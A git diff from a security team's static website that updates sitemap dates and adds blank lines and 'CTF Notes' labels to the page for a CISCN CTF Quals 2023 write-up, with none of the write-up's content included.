+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/ab21d401-10e1-4021-9936-e7154fd9ed71/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/bb168e48-791c-4a1d-83c4-335b9db12499/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/dfd03705-8ad1-420f-8534-0fd4086165e7/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/posts/f72cbee7-1294-46b9-92e3-49a3140255b2/
- 2023-08-07
+ 2023-08-15
daily
https://wiki.xmutsec.cn/writeup/CISCN-CTF-Quals-2023/
- 2023-08-07
+ 2023-08-15
daily
\ No newline at end of file
diff --git a/sitemap.xml.gz b/sitemap.xml.gz
index b0b1393..597caf8 100755
Binary files a/sitemap.xml.gz and b/sitemap.xml.gz differ
diff --git a/writeup/CISCN-CTF-Quals-2023/index.html b/writeup/CISCN-CTF-Quals-2023/index.html
index 0a9cefa..c8fc8fa 100755
--- a/writeup/CISCN-CTF-Quals-2023/index.html
+++ b/writeup/CISCN-CTF-Quals-2023/index.html
@@ -229,6 +229,22 @@
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
@@ -648,6 +664,433 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+ CTF Notes
+
+
+
+
+
+
+